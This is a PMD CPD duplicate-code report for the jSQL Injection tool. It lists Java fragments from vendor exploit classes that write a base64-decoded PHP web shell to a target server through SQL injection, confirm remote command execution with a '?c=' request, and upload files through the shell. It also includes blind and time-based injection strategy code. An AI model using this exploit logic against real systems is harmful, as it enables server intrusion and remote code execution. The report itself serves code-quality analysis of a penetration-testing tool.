CPD Results
The following document contains the results of PMD's CPD 7.7.0.
Duplications
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 58 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 58 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"), | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 61 |
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 64 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 60 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 93 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 92 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public ModelYamlDerby getModelYaml() { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 62 |
| com/jsql/util/bruter/Base16.java | model | 85 |
private static final byte[] UPPER_CASE_DECODE_TABLE = {
// 0 1 2 3 4 5 6 7 8 9 A B C D E F
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, -1, -1, -1, -1, -1, -1, // 30-3f 0-9
-1, 10, 11, 12, 13, 14, 15 // 40-46 A-F | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 64 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 93 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 102 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 128 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public ModelYamlH2 getModelYaml() { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 61 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 93 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 96 |
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 102 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 94 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 420 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 128 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public ModelYamlDerby getModelYaml() { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 318 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 402 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
bodyExploit.replace("'", "\"")
), ResourceAccess.ADD_LOID);
if (StringUtils.isEmpty(loid)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
return;
}
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
loid,
pathExploit + nameExploit
), ResourceAccess.WRITE_LOID);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 95 |
| com/jsql/model/injection/strategy/blind/InjectionVendor.java | model | 71 |
List<Future<CallableCharInsertion>> listTagTrue = taskExecutor.invokeAll(listCallableTagTrue);
this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor);
for (var i = 1 ; i < listTagTrue.size() ; i++) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.constantTrueMark.isEmpty()) {
this.constantTrueMark = listTagTrue.get(i).get().getOpcodes();
} else {
this.constantTrueMark.retainAll(listTagTrue.get(i).get().getOpcodes());
}
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
this.initFalseMarks(); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 98 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 422 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 130 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 104 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 96 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/view/terminal/interaction/MessageHeader.java | model | 33 |
| com/jsql/view/swing/interaction/MessageHeader.java | view | 44 |
@SuppressWarnings("unchecked")
public MessageHeader(Object[] interactionParams) {
Map<Header, Object> params = (Map<Header, Object>) interactionParams[0];
this.url = (String) params.getOrDefault(Header.URL, StringUtils.EMPTY);
this.post = (String) params.getOrDefault(Header.POST, StringUtils.EMPTY);
this.header = (Map<String, String>) params.getOrDefault(Header.HEADER, Collections.emptyMap());
this.response = (Map<String, String>) params.getOrDefault(Header.RESPONSE, Collections.emptyMap());
this.source = (String) params.getOrDefault(Header.SOURCE, StringUtils.EMPTY); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 64 |
| com/jsql/util/bruter/Base16.java | model | 87 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 48 |
| com/jsql/model/accessible/vendor/ExploitH2.java | model | 86 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getCreateTable(),
nameTable,
nameTable, bodyExploit.replace("'", "\"")
), ResourceAccess.TBL_CREATE);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getScriptSimple(),
pathExploit + nameExploit,
nameTable
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 40 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 40 |
ModelYamlDerby.class
);
}
public String createWeb(String pathExploit, String urlExploit) {
LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"), | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 173 |
| com/jsql/model/injection/strategy/blind/InjectionVendor.java | model | 142 |
);
try {
blindTest.call();
} catch (Exception e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
}
return blindTest.isTrue() && !this.constantTrueMark.isEmpty();
}
public String callUrl(String urlString, String metadataInjectionProcess) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess);
}
public String callUrl(String urlString, String metadataInjectionProcess, AbstractCallableBinary<?> callableBoolean) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess, callableBoolean);
}
// Getter
public String getBlankFalseMark() {
return this.blankFalseMark;
}
public List<Diff> getConstantTrueMark() {
return this.constantTrueMark;
}
} | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 64 |
| com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 87 |
| com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 64 |
| com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | ||
| File | Project | Line |
|---|---|---|
| com/jsql/util/bruter/Base16.java | model | 87 |
| com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 48 |
| com/jsql/model/accessible/vendor/ExploitDerby.java | model | 83 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 48 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 82 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "\""),
nameTable, pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 81 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 116 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web")
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = nameDbRandom + nameTableRandom +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getWriteFile(),
pathExploit + nameExploit, nameDbRandom,
nameDbRandom, nameTableRandom,
nameDbRandom, nameTableRandom, bodyExploit
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/view/swing/tab/TabResults.java | view | 168 |
| com/jsql/view/swing/tab/TabResults.java | view | 188 |
| com/jsql/view/swing/tab/TabResults.java | view | 208 |
| com/jsql/view/swing/tab/TabResults.java | view | 228 |
| com/jsql/view/swing/tab/TabResults.java | view | 248 |
var terminal = new ExploitRceOracle(terminalID);
MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal);
JScrollPane scroller = new JScrollPane(terminal);
this.addTab(TabResults.RCE_SHELL, scroller);
this.setSelectedComponent(scroller); // Focus on the new tab
var header = new TabHeader(TabResults.RCE_SHELL, UiUtil.TERMINAL.getIcon());
this.setTabComponentAt(this.indexOfComponent(scroller), header);
terminal.requestFocusInWindow();
this.updateUI(); // required: light, open/close prefs, dark => light artifacts
} catch (MalformedURLException | URISyntaxException e) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, TabResults.TAB_EXPLOIT_FAILURE_INCORRECT_URL, e);
}
}
public void addTabExploitRcePostgres() { | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyInjectionBlind.java | model | 46 |
| com/jsql/model/injection/strategy/StrategyInjectionTime.java | model | 46 |
} else if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBinaryBlind())) {
LOGGER.log(
LogLevelUtil.CONSOLE_ERROR,
AbstractStrategy.FORMAT_STRATEGY_NOT_IMPLEMENTED,
this.getName(),
this.injectionModel.getMediatorVendor().getVendor()
);
return;
}
this.checkInjection(BinaryMode.OR);
this.checkInjection(BinaryMode.AND);
this.checkInjection(BinaryMode.STACK);
this.checkInjection(BinaryMode.NO_MODE);
if (this.isApplicable) {
this.allow();
var requestMessageBinary = new Request();
requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY);
requestMessageBinary.setParameters(this.injectionBlind.getInfoMessage()); | ||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyInjectionBlind.java | model | 86 |
| com/jsql/model/injection/strategy/StrategyInjectionTime.java | model | 85 |
this.isApplicable = this.injectionBlind.isInjectable();
if (this.isApplicable) {
LOGGER.log(
LogLevelUtil.CONSOLE_SUCCESS,
"{} [{}] injection with [{}]",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE),
this::getName,
() -> binaryMode
);
}
}
@Override
public void allow(int... i) {
this.injectionModel.appendAnalysisReport(
StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName())
+ this.injectionModel.getReportWithoutIndex(
this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlind( | ||